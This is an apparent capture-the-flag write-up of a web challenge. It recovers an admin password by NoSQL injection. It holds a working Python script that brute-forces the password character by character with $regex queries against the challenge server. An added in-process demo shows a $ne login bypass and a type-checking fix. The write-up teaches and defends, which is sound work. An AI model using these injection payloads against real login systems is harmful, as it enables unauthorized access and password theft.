🇬🇧 RushCTF 2023 - web/secure-vault-v2
Note
First web challenge from RushCTF 2023. I liked this challenge a lot and learned something new about NoSQL injection. It might just be my favourite one from this CTF.
Description
My SecureVault was hacked last year. It was because of that damn SQL language, see if you can get my password now! Good luck
Hint: SAY NO TO …
Recon
Since the description talks about SQL and the hint tells us to “say no to …”, we can assume we are dealing with NoSQL injection. Note that the goal is not only to bypass the login, but to recover the admin's password.
Let’s first take a look at the website:
There is not much going on here: just a login form with two inputs. Let's capture the login request and play around with it.
Exploitation
After looking at the request, I came up with a payload that let me log in:
But remember, the goal is not to log in, but to get the admin's password.
Now that we know we can inject operators into the NoSQL query, we can use the `$regex` operator on the password field and brute-force it one character at a time: a regex that matches the known prefix plus one candidate character only succeeds when that candidate is the next character of the password, and the server reveals success through its status code. Let's write a Python script to automate this.
import requests

alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-}"
url = "http://challs.ctf.cafe:9999/login"

# We know the flag is going to look like RUSH{...}
flag = "RUSH{"

# Keep going until we reach the closing brace of the flag
while not flag.endswith("}"):
    # Try each possible next character
    for char in alphabet:
        # If the character is the correct one, the response is a 200 OK,
        # otherwise it is a 403 Forbidden. The regex is anchored with ^ so it
        # only matches passwords that start with the prefix we already know.
        res = requests.post(url,
            json={"username": {"$eq": "admin"},
                  "password": {"$regex": "^" + flag + char}})
        # Anything other than 403 means this character is the next one
        if res.status_code != 403:
            flag += char
            print(char, "is in the flag -- current flag:", flag)
            break
    else:
        # A full pass with no match: the alphabet is missing a character
        print("no candidate matched, stopping at", flag)
        break

print("flag:", flag)
Alright, let’s test it (took about 5 minutes):
And it worked! GG!
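To show why the attack works without needing the challenge server, here is an added example that is not part of the original writeup: a small in-process model of the vulnerable login, where the JSON body is used directly as a MongoDB-style query filter, next to a hardened version that only accepts string values. The same `$regex` extraction loop is run against both. The users collection, the flag value, the `$ne` login-bypass payload and the `mongo_match` evaluator are all constructed for this demo; the challenge's real payload and data are not shown on this page.

```python
import re

# Constructed stand-in for the challenge's users collection; this is not the
# real flag, just something in the RUSH{...} shape the extraction expects.
USERS = {"admin": "RUSH{F4KE_FL4G_F0R_D3M0}"}
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-}"


def mongo_match(value, condition):
    """Evaluate the small subset of MongoDB query operators this demo needs
    ($eq, $ne, $regex), the way a find() filter built straight from the
    request body would. A non-dict condition is a plain equality test."""
    if not isinstance(condition, dict):
        return value == condition
    for op, arg in condition.items():
        if op == "$eq":
            if value != arg:
                return False
        elif op == "$ne":
            if value == arg:
                return False
        elif op == "$regex":
            # Unanchored, like MongoDB: the pattern may match anywhere.
            if not isinstance(value, str) or re.search(arg, value) is None:
                return False
        else:
            raise ValueError(f"operator not modelled: {op}")
    return True


def vulnerable_login(body):
    """The bug: the JSON body is used as the query filter, so an attacker who
    sends an object instead of a string gets to choose the operator."""
    for username, password in USERS.items():
        if (mongo_match(username, body.get("username"))
                and mongo_match(password, body.get("password"))):
            return 200
    return 403


def hardened_login(body):
    """Fix: accept only strings. Any object-valued field is an injection
    attempt and is rejected before it reaches the database."""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return 400
    return 200 if USERS.get(username) == password else 403


def extract_password(login, username, prefix="RUSH{", alphabet=ALPHABET):
    """Recover the password one character at a time through $regex, using
    the HTTP status as the oracle. The pattern is anchored with ^ and the
    prefix is escaped so characters like '}' or '-' are matched literally.
    Returns None when no character in the alphabet extends the prefix."""
    known = prefix
    while not known.endswith("}"):
        for ch in alphabet:
            body = {
                "username": {"$eq": username},
                "password": {"$regex": "^" + re.escape(known + ch)},
            }
            if login(body) == 200:
                known += ch
                break
        else:
            return None
    return known


if __name__ == "__main__":
    # Hypothetical login bypass: any password that is not the empty string
    bypass = {"username": {"$eq": "admin"}, "password": {"$ne": ""}}
    print("bypass vs vulnerable:", vulnerable_login(bypass))   # 200
    print("bypass vs hardened:  ", hardened_login(bypass))     # 400
    print("extracted:", extract_password(vulnerable_login, "admin"))
    print("extracted (hardened):", extract_password(hardened_login, "admin"))
```

Two details matter in practice. The regex is anchored with `^` and the prefix is escaped, so the oracle only answers "is this the next character" rather than "does this appear anywhere", which keeps the greedy loop from wandering. And the fix is a type check rather than a blacklist of operator names: a string can never carry a `$regex` or `$ne` key, so rejecting non-string fields (or using a schema validator that does the same) closes the whole class.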
Conclusion
That is the end of this very nice, beginner-friendly CTF. I enjoyed it a lot and learned some new things.